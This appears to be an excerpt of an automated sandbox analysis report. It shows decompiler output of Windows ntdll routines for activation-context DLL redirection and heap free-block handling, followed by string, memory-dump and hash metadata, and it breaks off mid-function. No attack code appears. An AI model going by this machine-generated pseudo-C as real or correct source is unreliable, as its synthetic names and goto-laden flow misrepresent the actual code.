                                  							__eflags =  *_t300 - _t341;
                                  							if( *_t300 > _t341) {
                                  								goto L48;
                                  							}
                                  							__eflags =  *_t210 + _v76 - _v128;
                                  							if( *_t210 + _v76 > _v128) {
                                  								goto L48;
                                  							}
                                  							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
                                  							_t209 = _v48 + 1;
                                  							__eflags = _t209 - _v52;
                                  						}
                                  						_t303 = _v60;
                                  						__eflags = _t303;
                                  						if(_t303 != 0) {
                                  							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
                                  							__eflags =  *_t345;
                                  						}
                                  						_t214 = ( *_t345 & 0x0000ffff) + 2;
                                  						__eflags = _t214 - 0xfffe;
                                  						if(_t214 > 0xfffe) {
                                  							L76:
                                  							_t283 = 0xc0000106;
                                  							goto L2;
                                  						} else {
                                  							_t345 =  &(_t347[4]);
                                  							__eflags = _t345;
                                  							if(_t345 == 0) {
                                  								L60:
                                  								_t215 = E025C78E5(0, _t345, _t214);
                                  								__eflags = _t215;
                                  								if(_t215 >= 0) {
                                  									_t303 = _v60;
                                  									L29:
                                  									_t347[2] =  *_t345;
                                  									_t347[1] = _t347[8];
                                  									__eflags = _t303;
                                  									if(_t303 == 0) {
                                  										L34:
                                  										_v48 = _v48 & 0x00000000;
                                  										__eflags = _v52;
                                  										if(_v52 != 0) {
                                  											while(1) {
                                  												_t219 = _v48 << 3;
                                  												_t304 =  *((intOrPtr*)(_t219 + _t287));
                                  												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
                                  												_v80 = _t304;
                                  												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
                                  												__eflags = _t221 - 0xfffe;
                                  												if(_t221 > 0xfffe) {
                                  													goto L76;
                                  												}
                                  												__eflags =  &(_t347[4]);
                                  												if( &(_t347[4]) == 0) {
                                  													L68:
                                  													_t223 = E025C78E5(0,  &(_t347[4]), _t221);
                                  													__eflags = _t223;
                                  													if(_t223 < 0) {
                                  														goto L61;
                                  													}
                                  													L69:
                                  													_t347[2] = _t347[4];
                                  													E025A8980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
                                  													_t227 = _v80;
                                  													 *_t347 =  *_t347 + _t227;
                                  													_t347[1] =  *_t347 + _t227 + 2;
                                  													_t303 = _t347[2];
                                  													_t341 = 0;
                                  													_t350 = _t350 + 0xc;
                                  													_v48 = _v48 + 1;
                                  													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                  													__eflags = _v48 - _v52;
                                  													if(_v48 == _v52) {
                                  														goto L35;
                                  													}
                                  													continue;
                                  												}
                                  												__eflags = _t221 - _t347[8];
                                  												if(_t221 <= _t347[8]) {
                                  													goto L69;
                                  												}
                                  												goto L68;
                                  											}
                                  											goto L76;
                                  										}
                                  										L35:
                                  										_t232 =  *_v84;
                                  										_t345 = _v56;
                                  										__eflags = _t232 & 0x00000001;
                                  										if((_t232 & 0x00000001) != 0) {
                                  											L42:
                                  											__eflags =  *_v84 & 0x00000004;
                                  											if(__eflags != 0) {
                                  												_push(0);
                                  												_t341 = _t347;
                                  												_t283 = E0261C0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
                                  												__eflags = _t283;
                                  												if(_t283 < 0) {
                                  													goto L2;
                                  												}
                                  												 *_t347 = 0;
                                  												_t237 = (_v44 & 0x0000ffff) + 2;
                                  												__eflags = _t237 - 0xfffe;
                                  												if(_t237 > 0xfffe) {
                                  													goto L76;
                                  												}
                                  												_t288 =  &(_t347[4]);
                                  												__eflags = _t288;
                                  												if(_t288 == 0) {
                                  													L83:
                                  													_t238 = E025C78E5(0, _t288, _t237);
                                  													__eflags = _t238;
                                  													if(_t238 < 0) {
                                  														goto L61;
                                  													}
                                  													L84:
                                  													_t347[2] =  *_t288;
                                  													E025A8980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
                                  													_t242 = _v44;
                                  													 *_t347 =  *_t347 + _t242;
                                  													_t347[1] =  *_t347 + _t242 + 2;
                                  													_t341 = 0;
                                  													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                  													goto L43;
                                  												}
                                  												__eflags = _t237 - _t347[8];
                                  												if(_t237 <= _t347[8]) {
                                  													goto L84;
                                  												}
                                  												goto L83;
                                  											}
                                  											L43:
                                  											_t245 = _v88;
                                  											__eflags = _t245;
                                  											if(_t245 != 0) {
                                  												 *_t245 =  *_t245 | 0x00000002;
                                  											}
                                  											goto L44;
                                  										}
                                  										__eflags = _t232 & 0x00000008;
                                  										if((_t232 & 0x00000008) != 0) {
                                  											_t283 = E0259FBD7(1,  &_v68, 0x25cb024,  &_v56);
                                  											__eflags = _t283;
                                  											if(_t283 >= 0) {
                                  												_v68 = _v68 + 0xfffe - _v56;
                                  												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
                                  												goto L37;
                                  											}
                                  											__eflags = _t283 - 0xc0000225;
                                  											if(_t283 != 0xc0000225) {
                                  												goto L2;
                                  											}
                                  											_push("Status != STATUS_NOT_FOUND");
                                  											_push(0x472);
                                  											L74:
                                  											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
                                  											_push("Internal error check failed");
                                  											E026277A7(_t303, _t341);
                                  											_t283 = 0xc00000e5;
                                  											goto L2;
                                  										}
                                  										L37:
                                  										_t254 = _v68 & 0x0000ffff;
                                  										 *_t345 =  *_t345 + _t254;
                                  										__eflags =  *_t345 - 0xffff;
                                  										if( *_t345 >= 0xffff) {
                                  											goto L76;
                                  										}
                                  										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
                                  										__eflags = _t255 - 0xfffe;
                                  										if(_t255 > 0xfffe) {
                                  											goto L76;
                                  										}
                                  										_t287 =  &(_t347[4]);
                                  										__eflags = _t287;
                                  										if(_t287 == 0) {
                                  											L77:
                                  											_t256 = E025C78E5(0, _t287, _t255);
                                  											__eflags = _t256;
                                  											if(_t256 >= 0) {
                                  												L41:
                                  												_t347[2] =  *_t287;
                                  												E025A8980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
                                  												_t260 = _v68;
                                  												 *_t347 =  *_t347 + _t260;
                                  												_t347[1] =  *_t347 + _t260 + 2;
                                  												_t350 = _t350 + 0xc;
                                  												_t341 = 0;
                                  												__eflags = 0;
                                  												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                  												goto L42;
                                  											}
                                  											goto L61;
                                  										}
                                  										__eflags = _t255 - _t347[8];
                                  										if(_t255 > _t347[8]) {
                                  											goto L77;
                                  										}
                                  										goto L41;
                                  									}
                                  									 *_t347 = 0;
                                  									_t266 = ( *_t303 & 0x0000ffff) + 2;
                                  									__eflags = _t266 - 0xfffe;
                                  									if(_t266 > 0xfffe) {
                                  										goto L76;
                                  									}
                                  									__eflags = _t345;
                                  									if(_t345 == 0) {
                                  										L63:
                                  										_t267 = E025C78E5(0, _t345, _t266);
                                  										__eflags = _t267;
                                  										if(_t267 < 0) {
                                  											goto L61;
                                  										}
                                  										_t303 = _v60;
                                  										L33:
                                  										_t347[2] =  *_t345;
                                  										E025A8980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                  										_t271 = _v60;
                                  										_t350 = _t350 + 0xc;
                                  										_t347[1] =  *_t347 +  *_t271 + 2;
                                  										 *_t347 =  *_t347 +  *_t271;
                                  										_t303 = _t347[2];
                                  										_t341 = 0;
                                  										__eflags = 0;
                                  										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                  										goto L34;
                                  									}
                                  									__eflags = _t266 - _t347[8];
                                  									if(_t266 > _t347[8]) {
                                  										goto L63;
                                  									}
                                  									goto L33;
                                  								}
                                  								L61:
                                  								_t283 = 0xc0000017;
                                  								goto L2;
                                  							}
                                  							__eflags = _t214 - _t347[8];
                                  							if(_t214 > _t347[8]) {
                                  								goto L60;
                                  							}
                                  							goto L29;
                                  						}
                                  					}
                                  					_t303 = 0;
                                  					_v48 = 0;
                                  					__eflags = _t207 & 0x00000004;
                                  					if((_t207 & 0x00000004) != 0) {
                                  						_push("sxsisol_SearchActCtxForDllName");
                                  						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
                                  						E025E3F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
                                  						goto L48;
                                  					}
                                  					__eflags = _v116 & 0x00000001;
                                  					if((_v116 & 0x00000001) != 0) {
                                  						__eflags = _v116 & 0x00000002;
                                  						if((_v116 & 0x00000002) != 0) {
                                  							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
                                  							_push(0x416);
                                  							goto L74;
                                  						}
                                  						_t303 = 1;
                                  					}
                                  					__eflags = _v116 & 0x00000002;
                                  					if((_v116 & 0x00000002) != 0) {
                                  						_t303 = _t303 | 0x00000002;
                                  					}
                                  					_t283 = E025BC507(_t303, _v124, _v120,  &_v60, 0x25bcdad,  &_v48);
                                  					__eflags = _t283;
                                  					if(_t283 < 0) {
                                  						__eflags = _t283 - 0xc0000120;
                                  						if(_t283 == 0xc0000120) {
                                  							__eflags = _v48;
                                  							if(_v48 < 0) {
                                  								_t283 = _v48;
                                  							}
                                  						}
                                  						goto L2;
                                  					} else {
                                  						goto L22;
                                  					}
                                  				}
                                  				if(_t283 == 0xc0150001) {
                                  					_t283 = _t283 + 7;
                                  				}
                                  				goto L2;
                                  			}

                                  Strings
                                  • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 025F3D74
                                  • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 025F3C08
                                  • sxsisol_SearchActCtxForDllName, xrefs: 025F3BCE
                                  • Internal error check failed, xrefs: 025F3D79
                                  • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 025F3BDF
                                  • @, xrefs: 0259F3FE
                                  • Status != STATUS_NOT_FOUND, xrefs: 025F3D6A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                  • API String ID: 0-4103935307
                                  • Opcode ID: 60aa1fc028ee034566bc37b047ab91b50eea14403f56d7797aac4931deca33d1
                                  • Instruction ID: 9706ee063d7d733030d4119b58b740e11143c35d1b92da1d26a8ae02edeecae2
                                  • Opcode Fuzzy Hash: 60aa1fc028ee034566bc37b047ab91b50eea14403f56d7797aac4931deca33d1
                                  • Instruction Fuzzy Hash: F702A07090020AEFEB24CFA9C881ABEB7F5FF48704F10846EE556E7650E7749985CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E025BEE4C(void* __ebx, void* __edi, signed int _a4, unsigned int _a8, signed int _a12, signed int _a16) {
                                  				signed int _v8;
                                  				char _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				char _v36;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t258;
                                  				signed char _t259;
                                  				signed int _t261;
                                  				signed int _t271;
                                  				signed int _t274;
                                  				signed int _t275;
                                  				signed int _t276;
                                  				signed int _t278;
                                  				signed char _t279;
                                  				intOrPtr _t281;
                                  				signed int _t293;
                                  				intOrPtr _t300;
                                  				intOrPtr _t301;
                                  				unsigned int _t307;
                                  				signed char _t308;
                                  				signed int _t317;
                                  				unsigned int _t326;
                                  				signed int _t327;
                                  				intOrPtr _t335;
                                  				intOrPtr _t347;
                                  				signed int _t357;
                                  				signed int _t358;
                                  				signed int _t359;
                                  				signed int _t360;
                                  				signed char _t363;
                                  				signed int _t370;
                                  				unsigned int _t380;
                                  				signed int _t381;
                                  				intOrPtr _t389;
                                  				signed int _t401;
                                  				intOrPtr _t403;
                                  				void* _t410;
                                  				signed int _t420;
                                  				signed int _t421;
                                  				unsigned int* _t426;
                                  				signed int _t432;
                                  				signed int _t442;
                                  				intOrPtr _t444;
                                  				signed int _t452;
                                  				signed int _t456;
                                  				intOrPtr _t457;
                                  				void* _t472;
                                  				signed int _t480;
                                  				void* _t483;
                                  				signed int _t484;
                                  				intOrPtr _t486;
                                  				signed short* _t487;
                                  				signed short* _t488;
                                  				unsigned int _t492;
                                  				signed int _t493;
                                  
                                  				_t493 = _a4;
                                  				_v12 = 0;
                                  				if(( *(_t493 + 0xd0) ^  *(_t493 + 0x58)) != 0) {
                                  					return E025A7353(_t493, _a8, _a12);
                                  				}
                                  				if(_a16 != 0) {
                                  					_t420 = _a8;
                                  					__eflags =  *(_t420 + 2) & 0x00000008;
                                  					if(( *(_t420 + 2) & 0x00000008) != 0) {
                                  						 *((intOrPtr*)(_t493 + 0x120)) =  *((intOrPtr*)(_t493 + 0x120)) - 1;
                                  						_t258 = E025C61B3(_t420,  &_v36,  &_v24);
                                  						__eflags = _t258;
                                  						if(_t258 != 0) {
                                  							 *((intOrPtr*)(_t493 + 0x124)) =  *((intOrPtr*)(_t493 + 0x124)) - _v24;
                                  						}
                                  					}
                                  					_a4 = _t420;
                                  					L13:
                                  					_t259 =  *((intOrPtr*)(_t420 + 6));
                                  					__eflags = _t259;
                                  					if(_t259 == 0) {
                                  						_t421 = _t493;
                                  						_v20 = _t493;
                                  					} else {
                                  						_t421 = (_t420 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
                                  						__eflags = _t421;
                                  						_v20 = _t421;
                                  					}
                                  					_t261 = _a4 + _a12 * 8;
                                  					__eflags =  *((char*)(_t261 + 7)) - 3;
                                  					_v24 = _t261;
                                  					if( *((char*)(_t261 + 7)) == 3) {
                                  						_t483 = _t261 + 8;
                                  						E025AAB77(_t493, _t483);
                                  						_v28 =  *((intOrPtr*)(_t483 + 0x10));
                                  						 *((intOrPtr*)(_t421 + 0x30)) =  *((intOrPtr*)(_t421 + 0x30)) - 1;
                                  						_v16 =  *(_t483 + 0x14);
                                  						 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) - ( *(_t483 + 0x14) >> 0xc);
                                  						 *(_t493 + 0xe0) =  *(_t493 + 0xe0) +  *(_t483 + 0x14);
                                  						 *((intOrPtr*)(_t493 + 0xf0)) =  *((intOrPtr*)(_t493 + 0xf0)) - 1;
                                  						__eflags =  *(_t483 + 0x14) - 0x7f000;
                                  						if( *(_t483 + 0x14) >= 0x7f000) {
                                  							_t102 = _t493 + 0xe4;
                                  							 *_t102 =  *(_t493 + 0xe4) -  *(_t483 + 0x14);
                                  							__eflags =  *_t102;
                                  						}
                                  						_a12 = _a12 + ( *(_t483 + 0x14) >> 3) + 0x20;
                                  						_v12 = 1;
                                  					} else {
                                  						_t32 =  &_v16;
                                  						 *_t32 = _v16 & 0x00000000;
                                  						__eflags =  *_t32;
                                  					}
                                  					_t271 = _a4;
                                  					__eflags =  *(_t271 + 4) ^  *(_t493 + 0x54);
                                  					if(( *(_t271 + 4) ^  *(_t493 + 0x54)) == 0) {
                                  						_t471 = _a4;
                                  						_v8 = _a4;
                                  						_t274 = E025E8C11(_t421, _a4);
                                  						__eflags = _a16;
                                  						_t484 = _t274;
                                  						if(_a16 != 0) {
                                  							__eflags = _t484;
                                  							if(_t484 != 0) {
                                  								goto L56;
                                  							}
                                  							goto L18;
                                  						}
                                  						L56:
                                  						__eflags =  *0x26777b0 - 1;
                                  						if( *0x26777b0 >= 1) {
                                  							__eflags = _t484;
                                  							if(_t484 == 0) {
                                  								_t347 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  								__eflags =  *((intOrPtr*)(_t347 + 0xc)) - _t484;
                                  								if( *((intOrPtr*)(_t347 + 0xc)) == _t484) {
                                  									_push("HEAP: ");
                                  									E025E373B();
                                  								} else {
                                  									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push("(UCRBlock != NULL)");
                                  								E025E373B();
                                  								E0263F826(_t421, _t471, _t484, _t493, 1);
                                  							}
                                  						}
                                  						__eflags = _v12;
                                  						_t275 = _a12;
                                  						_t432 = _a4;
                                  						if(_v12 != 0) {
                                  							_t276 = _t432 + _t275 * 8;
                                  						} else {
                                  							_t130 = _t275 * 8; // -16
                                  							_t276 = _t432 + _t130 - 0x10;
                                  						}
                                  						_t278 = (_t276 & 0xfffff000) - _v8;
                                  						__eflags = _t278;
                                  						_a8 = _t278;
                                  						if(__eflags == 0) {
                                  							L85:
                                  							__eflags =  *0x26777b0 - 1;
                                  							if( *0x26777b0 >= 1) {
                                  								__eflags = _v12;
                                  								if(_v12 != 0) {
                                  									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  									__eflags =  *(_t281 + 0xc);
                                  									if( *(_t281 + 0xc) == 0) {
                                  										_push("HEAP: ");
                                  										E025E373B();
                                  									} else {
                                  										E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  									}
                                  									_push("(!TrailingUCR)");
                                  									E025E373B();
                                  									E0263F826(_t421, _t471, _t484, _t493, 1);
                                  								}
                                  							}
                                  							goto L54;
                                  						} else {
                                  							_t293 = E025A4167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
                                  							__eflags = _t293;
                                  							if(_t293 < 0) {
                                  								L89:
                                  								_t472 = 3;
                                  								E025A444F(_t493, _t472);
                                  								__eflags = _v12;
                                  								if(_v12 != 0) {
                                  									E025AA96B(_t493, _t421, _v28 + 0xffffffe8, _v16, _a4,  &_a12);
                                  								}
                                  								L54:
                                  								_push(_a12);
                                  								_push(_a4);
                                  								L12:
                                  								_push(_t493);
                                  								_t279 = E025A7353();
                                  								L7:
                                  								return _t279;
                                  							}
                                  							__eflags =  *0x7ffe0380;
                                  							if( *0x7ffe0380 != 0) {
                                  								_t300 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  								__eflags =  *(_t300 + 0x240) & 0x00000001;
                                  								if(( *(_t300 + 0x240) & 0x00000001) != 0) {
                                  									E0263EFE0(_t493, _v8, _a8, 5);
                                  								}
                                  							}
                                  							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
                                  							_t301 =  *((intOrPtr*)(_t484 + 0x14));
                                  							__eflags = _t301 - 0x7f000;
                                  							if(_t301 >= 0x7f000) {
                                  								_t139 = _t493 + 0xe4;
                                  								 *_t139 =  *(_t493 + 0xe4) - _t301;
                                  								__eflags =  *_t139;
                                  							}
                                  							E025AAB77(_t493, _t484);
                                  							 *((intOrPtr*)(_t484 + 0x14)) =  *((intOrPtr*)(_t484 + 0x14)) + _a8;
                                  							E025AAA2C(_t493, _t484);
                                  							 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) + (_a8 >> 0xc);
                                  							_t307 = _a8;
                                  							 *(_t493 + 0xe0) =  *(_t493 + 0xe0) - _t307;
                                  							_t486 =  *((intOrPtr*)(_t484 + 0x14));
                                  							__eflags = _t486 - 0x7f000;
                                  							if(_t486 >= 0x7f000) {
                                  								_t151 = _t493 + 0xe4;
                                  								 *_t151 =  *(_t493 + 0xe4) + _t486;
                                  								__eflags =  *_t151;
                                  							}
                                  							__eflags = _v12;
                                  							if(_v12 != 0) {
                                  								L73:
                                  								_t308 =  *0x7ffe0380;
                                  								__eflags = _t308;
                                  								if(_t308 != 0) {
                                  									__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
                                  									if(__eflags != 0) {
                                  										E0263F48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, _v12, _v16, _t308 & 0x000000ff);
                                  									}
                                  								}
                                  								_t279 =  *0x7ffe038a;
                                  								__eflags = _t279;
                                  								if(__eflags != 0) {
                                  									_push(_t279 & 0x000000ff);
                                  									_push(_v16);
                                  									_push(_v12);
                                  									L118:
                                  									_push( *(_t493 + 0x78) << 3);
                                  									_push(_a8);
                                  									_push(_v8);
                                  									_push(_t493);
                                  									_t279 = E0263F48C(__eflags);
                                  								}
                                  								goto L7;
                                  							} else {
                                  								_t487 = _t307 + _v8;
                                  								_t442 = _a4;
                                  								_t487[2] =  *(_t493 + 0x54);
                                  								_t317 = _a12;
                                  								_t476 = _a8 + _v8;
                                  								__eflags = _t442 + _t317 * 8 - _a8 + _v8;
                                  								if(_t442 + _t317 * 8 == _a8 + _v8) {
                                  									__eflags =  *(_t493 + 0x4c);
                                  									if( *(_t493 + 0x4c) != 0) {
                                  										_t487[1] = _t487[1] ^ _t487[0] ^  *_t487;
                                  										 *_t487 =  *_t487 ^  *(_t493 + 0x50);
                                  									}
                                  									goto L73;
                                  								}
                                  								_t487[3] = 0;
                                  								_t487[1] = 0;
                                  								_t326 = (_a12 << 3) - _a8 >> 3;
                                  								 *_t487 = _t326;
                                  								__eflags =  *0x26777b0 - 1;
                                  								if( *0x26777b0 >= 1) {
                                  									__eflags = _t326 - 1;
                                  									if(_t326 <= 1) {
                                  										_t335 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  										__eflags =  *(_t335 + 0xc);
                                  										if( *(_t335 + 0xc) == 0) {
                                  											_push("HEAP: ");
                                  											E025E373B();
                                  										} else {
                                  											E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  										}
                                  										_push("((LONG)FreeEntry->Size > 1)");
                                  										E025E373B();
                                  										E0263F826(_t421, _t476, _t487, _t493, 1);
                                  									}
                                  								}
                                  								_t487[1] = 0;
                                  								_t444 =  *((intOrPtr*)(_t421 + 0x18));
                                  								__eflags = _t444 - _t421;
                                  								if(_t444 == _t421) {
                                  									_t327 = 0;
                                  								} else {
                                  									_t327 = (_t487 - _t421 >> 0x10) + 1;
                                  									_a16 = _t327;
                                  									__eflags = _t327;
                                  									if(__eflags <= 0) {
                                  										L99:
                                  										_push(0);
                                  										_push(0);
                                  										_push(_t421);
                                  										_push(_t487);
                                  										_push(_t444);
                                  										_push(3);
                                  										E0263F840(_t421, _t444, _t476, _t487, _t493, __eflags);
                                  										_t327 = _a16;
                                  										L72:
                                  										_t487[3] = _t327;
                                  										E025A7353(_t493, _t487,  *_t487 & 0x0000ffff);
                                  										goto L73;
                                  									}
                                  									__eflags = _t327 - 0xfe;
                                  									if(__eflags >= 0) {
                                  										goto L99;
                                  									}
                                  								}
                                  								goto L72;
                                  							}
                                  						}
                                  					}
                                  					L18:
                                  					_t357 = _a4;
                                  					_t38 = _t357 + 0x101f; // 0x101f
                                  					_t484 = 0xfffff000;
                                  					_t452 = _t38 & 0xfffff000;
                                  					_t39 = _t357 + 0x28; // 0x28
                                  					_v8 = _t452;
                                  					__eflags = _t452 - _t39;
                                  					if(_t452 == _t39) {
                                  						_t452 = _t452 + 0x1000;
                                  						_v8 = _t452;
                                  					}
                                  					__eflags = _v12;
                                  					_t471 = _a12;
                                  					if(_v12 != 0) {
                                  						_t358 = _t357 + _t471 * 8;
                                  					} else {
                                  						_t358 = _t357 + _t471 * 8 - 0x10;
                                  					}
                                  					_t359 = _t358 & _t484;
                                  					_a8 = _t359;
                                  					__eflags = _t359 - _t452;
                                  					if(_t359 < _t452) {
                                  						goto L85;
                                  					} else {
                                  						_t360 = _t359 - _t452;
                                  						__eflags = _a16;
                                  						_a8 = _t360;
                                  						if(_a16 != 0) {
                                  							L26:
                                  							__eflags = _t360;
                                  							if(__eflags == 0) {
                                  								L30:
                                  								__eflags = _v12;
                                  								if(_v12 != 0) {
                                  									L38:
                                  									E025AA96B(_t493, _t421, _t452 + 0xffffffe8, _t360, _a4,  &_v32);
                                  									E025A7353(_t493, _a4, _v32);
                                  									_t363 =  *0x7ffe0380;
                                  									__eflags = _t363;
                                  									if(_t363 != 0) {
                                  										__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
                                  										if(__eflags != 0) {
                                  											E0263F48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, 0, 0, _t363 & 0x000000ff);
                                  										}
                                  									}
                                  									_t279 =  *0x7ffe038a;
                                  									__eflags = _t279;
                                  									if(__eflags == 0) {
                                  										goto L7;
                                  									} else {
                                  										_push(_t279 & 0x000000ff);
                                  										_push(0);
                                  										_push(0);
                                  										goto L118;
                                  									}
                                  								}
                                  								_t488 = _t360 + _t452;
                                  								_t456 = _a4;
                                  								_t488[2] =  *(_t493 + 0x54);
                                  								_t370 = _a12;
                                  								_t479 = _t456 + _t370 * 8;
                                  								_t360 = _a8;
                                  								_t452 = _v8;
                                  								_t423 = _t360 + _t452;
                                  								__eflags = _t456 + _t370 * 8 - _t360 + _t452;
                                  								if(_t456 + _t370 * 8 == _t360 + _t452) {
                                  									__eflags =  *(_t493 + 0x4c);
                                  									_t421 = _v20;
                                  									if( *(_t493 + 0x4c) != 0) {
                                  										_t488[1] = _t488[1] ^ _t488[0] ^  *_t488;
                                  										 *_t488 =  *_t488 ^  *(_t493 + 0x50);
                                  										L37:
                                  										_t360 = _a8;
                                  										_t452 = _v8;
                                  										goto L38;
                                  									}
                                  									goto L38;
                                  								}
                                  								_t488[3] = 0;
                                  								_t488[1] = 0;
                                  								_t380 = (_a12 << 3) - _a8 - _v8 + _a4 >> 3;
                                  								 *_t488 = _t380;
                                  								__eflags =  *0x26777b0 - 1;
                                  								if( *0x26777b0 >= 1) {
                                  									__eflags = _t380 - 1;
                                  									if(_t380 <= 1) {
                                  										_t389 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  										__eflags =  *(_t389 + 0xc);
                                  										if( *(_t389 + 0xc) == 0) {
                                  											_push("HEAP: ");
                                  											E025E373B();
                                  										} else {
                                  											E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  										}
                                  										_push("(LONG)FreeEntry->Size > 1");
                                  										E025E373B();
                                  										E0263F826(_t423, _t479, _t488, _t493, 1);
                                  									}
                                  								}
                                  								_t421 = _v20;
                                  								_t488[1] = 0;
                                  								_t457 =  *((intOrPtr*)(_t421 + 0x18));
                                  								__eflags = _t457 - _t421;
                                  								if(_t457 == _t421) {
                                  									_t381 = 0;
                                  								} else {
                                  									_t381 = (_t488 - _t421 >> 0x10) + 1;
                                  									_a16 = _t381;
                                  									__eflags = _t381;
                                  									if(__eflags <= 0) {
                                  										L113:
                                  										_push(0);
                                  										_push(0);
                                  										_push(_t421);
                                  										_push(_t488);
                                  										_push(_t457);
                                  										_push(3);
                                  										E0263F840(_t421, _t457, _t479, _t488, _t493, __eflags);
                                  										_t381 = _a16;
                                  										L36:
                                  										_t488[3] = _t381;
                                  										E025A7353(_t493, _t488,  *_t488 & 0x0000ffff);
                                  										goto L37;
                                  									}
                                  									__eflags = _t381 - 0xfe;
                                  									if(__eflags >= 0) {
                                  										goto L113;
                                  									}
                                  								}
                                  								goto L36;
                                  							}
                                  							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
                                  							_t401 = E025A4167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
                                  							__eflags = _t401;
                                  							if(_t401 < 0) {
                                  								goto L89;
                                  							}
                                  							__eflags =  *0x7ffe0380;
                                  							if( *0x7ffe0380 != 0) {
                                  								_t403 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  								__eflags =  *(_t403 + 0x240) & 0x00000001;
                                  								if(( *(_t403 + 0x240) & 0x00000001) != 0) {
                                  									E0263EFE0(_t493, _v8, _a8, 6);
                                  								}
                                  							}
                                  							_t360 = _a8;
                                  							_t452 = _v8;
                                  							goto L30;
                                  						}
                                  						_t471 = _v24;
                                  						__eflags =  *((char*)(_t471 + 7)) - 3;
                                  						if( *((char*)(_t471 + 7)) == 3) {
                                  							goto L26;
                                  						}
                                  						__eflags = _t360;
                                  						if(_t360 == 0) {
                                  							goto L54;
                                  						}
                                  						__eflags = _t360 -  *((intOrPtr*)(_t493 + 0x70));
